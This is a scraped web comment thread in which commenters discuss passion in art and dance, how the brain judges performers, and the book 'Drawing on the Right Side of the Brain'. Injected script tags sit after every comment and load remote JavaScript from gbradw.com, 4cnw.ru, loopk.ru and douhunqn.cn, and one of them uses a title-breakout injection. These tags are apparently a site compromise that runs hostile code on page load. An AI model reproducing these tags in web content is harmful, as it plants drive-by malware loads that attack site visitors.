I have been an artist all of my life, both as a painter and a dancer. I have my own likes and dislikes, yes, and during critiques one often has to stand back and listen to what others have to say about their work to truly understand it, and often the artist can win you over with passion. Sometimes, though, we don't get a sense of passion from the artist, and so we are left feeling less than satisfied with a piece or performance. I have often felt that one cannot separate the art from the artist, and in dance, we all know when a dancer is dancing from that "special" place of passion for the art... and we feel it too. I think this is what makes it special for us, no matter what style the dancer chooses.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

Although what you wrote sounds good and interesting, I would like to ask you if you speak from a scientific prospective on the mater, or is it just what you believe is going on in the brain? And where did this analysis come from?
Respectfully, Ziad.

In addition to years of teaching visual art, dance, and metaphysicals to persons of all ages and backgrounds, I have also have studied biology, psychology, and other related sciences on the college level, in addition to my BFA. I'm also a people-watcher, and I like to find out why people to react to art in different ways.
One interesting book you may want to look at is "Drawing on the Right Side of the Brain."<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

| "></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--this is definitely why we as dancers have our favorites- i've heard so many of us, including me, saying "wow, she does those unique combos just like dina!" when watching a very skilled dancer, then we'll see a dancer who really doesn't have the training, but knows how to connect to the music and audience and we'll say, "she really feels the music unlike any dancer!" i hope your article will push us to use both sides of our brain when "judging" dancers. thank you.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
